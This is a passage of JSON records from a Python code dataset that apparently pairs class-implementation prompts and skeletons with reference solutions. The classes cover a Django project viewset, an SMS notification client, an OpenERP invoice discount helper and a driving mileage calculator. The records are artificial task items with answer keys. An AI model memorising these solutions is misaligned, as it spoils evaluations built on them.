CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000040", "length_bytes": 30302, "license_type": "permissive", "methods": [{"docstring": "delete tag", "name": "delete_tag", "signature": "def delete_tag(self, request, pk=None)"}, {"docstring": "relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp", "name": "relabel_keep_alive", "signature": "def relabel_keep_alive(self, request, pk=None) -> Response"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003694", "prompt": "Implement the Python class `ProjectViewSet` described below.\n\nClass description:\nProject ModelViewSet Filters: is_demo\n\nMethod signatures and docstrings:\n- def delete_tag(self, request, pk=None): delete tag\n- def relabel_keep_alive(self, request, pk=None) -> Response: relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp", "prompted_full_text": "Implement the Python class `ProjectViewSet` described below.\n\nClass description:\nProject ModelViewSet Filters: is_demo\n\nMethod signatures and docstrings:\n- def delete_tag(self, request, pk=None): delete tag\n- def relabel_keep_alive(self, request, pk=None) -> Response: relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\n\n<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n<|end_body_0|>\n\n<|body_start_1|>\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "d72c3c1c2d56a762b74a72cd3befd076dc77b8ac", "skeleton": "<|skeleton|>\nclass ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n <|body_0|>\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectViewSet:\n \"\"\"Project ModelViewSet Filters: is_demo\"\"\"\n\n def delete_tag(self, request, pk=None):\n \"\"\"delete tag\"\"\"\n try:\n project_obj = self.get_object()\n part_id = request.query_params.get('part_id') or None\n part_name = request.query_params.get('part_name') or None\n if part_id is not None:\n project_obj.delete_tag_by_id(tag_id=part_id)\n return Response({'status': 'ok'})\n if part_name is not None:\n project_obj.delete_tag_by_name(tag_name=part_name)\n return Response({'status': 'ok'})\n raise AttributeError('part_name or part_id not found')\n except AttributeError as attr_err:\n return Response({'status': 'failed', 'log': str(attr_err)}, status=status.HTTP_400_BAD_REQUEST)\n except CustomVisionErrorException as customvision_err:\n return Response({'status': 'failed', 'log': str(customvision_err)}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n def relabel_keep_alive(self, request, pk=None) -> Response:\n \"\"\"relabel_keep_alive. Args: request: kwargs: Returns: Response: Return project with updated timestamp\"\"\"\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset, pk=pk)\n obj.relabel_expired_time = timezone.now() + datetime.timedelta(seconds=PROJECT_RELABEL_TIME_THRESHOLD)\n obj.save()\n serializer = ProjectSerializer(obj)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/azure_training/api/views.py", "source_repo": "timlawless/azure-intelligent-edge-patterns", "split": "test", "star_events_count": 0} {"blob_id": "639e2df453845137d4f08f8788514c4bbd16fe2e", "bodies": ["uri = '%s/sms/send' % self.uri_prefix\npost_body = {'phone': phone, 'sms': message}\npost_body = json.dumps(post_body)\nresp, body = self.post(uri, post_body)\nself.expected_success(201, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)", "uri = '%s/sms/config' % self.uri_prefix\nif kwargs:\n cfg.update(kwargs)\ncfg = json.dumps(cfg)\npost_body = {'config': cfg}\npost_body = json.dumps(post_body)\nresp, body = self.post(uri, post_body)\nself.expected_success(201, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)", "uri = '%s/sms/config' % self.uri_prefix\nresp, body = self.get(uri)\nself.expected_success(200, resp.status)\nbody = json.loads(body)\nreturn service_client.ResponseBody(resp, body)"], "bodies_text": "<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "SfNotifySmsClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000041", "length_bytes": 2272, "license_type": "permissive", "methods": [{"docstring": "create sms :param phone(required): The phone number to send :param message(required): Content of short message", "name": "sms_create", "signature": "def sms_create(self, phone, message)"}, {"docstring": "update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section", "name": "sms_config_set", "signature": "def sms_config_set(self, cfg, **kwargs)"}, {"docstring": "get config ini file", "name": "sms_config_get", "signature": "def sms_config_get(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005286", "prompt": "Implement the Python class `SfNotifySmsClient` described below.\n\nClass description:\nImplement the SfNotifySmsClient class.\n\nMethod signatures and docstrings:\n- def sms_create(self, phone, message): create sms :param phone(required): The phone number to send :param message(required): Content of short message\n- def sms_config_set(self, cfg, **kwargs): update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\n- def sms_config_get(self): get config ini file", "prompted_full_text": "Implement the Python class `SfNotifySmsClient` described below.\n\nClass description:\nImplement the SfNotifySmsClient class.\n\nMethod signatures and docstrings:\n- def sms_create(self, phone, message): create sms :param phone(required): The phone number to send :param message(required): Content of short message\n- def sms_config_set(self, cfg, **kwargs): update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\n- def sms_config_get(self): get config ini file\n\n<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "revision_id": "1ccdab06d5800572ee0fc569c87d56332efe1538", "skeleton": "<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SfNotifySmsClient:\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n", "source": "the_stack_v2_python_sparse", "source_path": "yibo/tempest/tempest/services/sf_notify/json/sf_notify_sms_client.py", "source_repo": "laoyigrace/files", "split": "test", "star_events_count": 0} {"blob_id": "3d24fd6755f714a54ea8a3c0add0fed752b9608c", "bodies": ["discount = 0.0\nif move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\nelif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\nreturn discount", "discount = 0.0\nif move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\nelif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\nreturn discount", "price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\nif move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\nelif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\nreturn price_unit", "result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\nresult['discount'] = self._get_discount_invoice(cr, uid, move_line)\nresult['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\nresult['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\nreturn result"], "bodies_text": "<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "class_docstring": "", "class_name": "stock_picking", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000042", "length_bytes": 3397, "license_type": "no_license", "methods": [{"docstring": "Return the discount for the move line", "name": "_get_discount_invoice", "signature": "def _get_discount_invoice(self, cr, uid, move_line)"}, {"docstring": "Return the discount for the move line", "name": "_get_discount2_invoice", "signature": "def _get_discount2_invoice(self, cr, uid, move_line)"}, {"docstring": "Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line", "name": "_get_price_unit_invoice", "signature": "def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None)"}, {"docstring": "Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line", "name": "_prepare_invoice_line", "signature": "def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002653", "prompt": "Implement the Python class `stock_picking` described below.\n\nClass description:\nImplement the stock_picking class.\n\nMethod signatures and docstrings:\n- def _get_discount_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_discount2_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None): Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\n- def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None): Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line", "prompted_full_text": "Implement the Python class `stock_picking` described below.\n\nClass description:\nImplement the stock_picking class.\n\nMethod signatures and docstrings:\n- def _get_discount_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_discount2_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None): Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\n- def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None): Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\n\n<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "revision_id": "78fc164679b690bcf84866987266838de134bc2f", "skeleton": "<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class stock_picking:\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "openforce_pricelist_discount_line/stock/stock_picking.py", "source_repo": "alessandrocamilli/7-openforce-addons", "split": "test", "star_events_count": 1} {"blob_id": "ff046abe78ec256785e4479dcf80a8f70495548a", "bodies": ["self.auto_mileage = 0.0\nself.manual_mileage = 0.0\nself.disengagements = 0", "last_pos = None\nlast_mode = 'Unknown'\nmileage = collections.defaultdict(lambda: 0.0)\nchassis = chassis_pb2.Chassis()\nlocalization = localization_pb2.LocalizationEstimate()\nreader = RecordReader(bag_file)\nfor msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\nself.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\nself.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]"], "bodies_text": "<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "class_docstring": "Calculate mileage", "class_name": "MileageCalculator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000043", "length_bytes": 3604, "license_type": "permissive", "methods": [{"docstring": "Init.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Calculate mileage", "name": "calculate", "signature": "def calculate(self, bag_file)"}], "n_methods": 2, "prompt": "Implement the Python class `MileageCalculator` described below.\n\nClass description:\nCalculate mileage\n\nMethod signatures and docstrings:\n- def __init__(self): Init.\n- def calculate(self, bag_file): Calculate mileage", "prompted_full_text": "Implement the Python class `MileageCalculator` described below.\n\nClass description:\nCalculate mileage\n\nMethod signatures and docstrings:\n- def __init__(self): Init.\n- def calculate(self, bag_file): Calculate mileage\n\n<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == 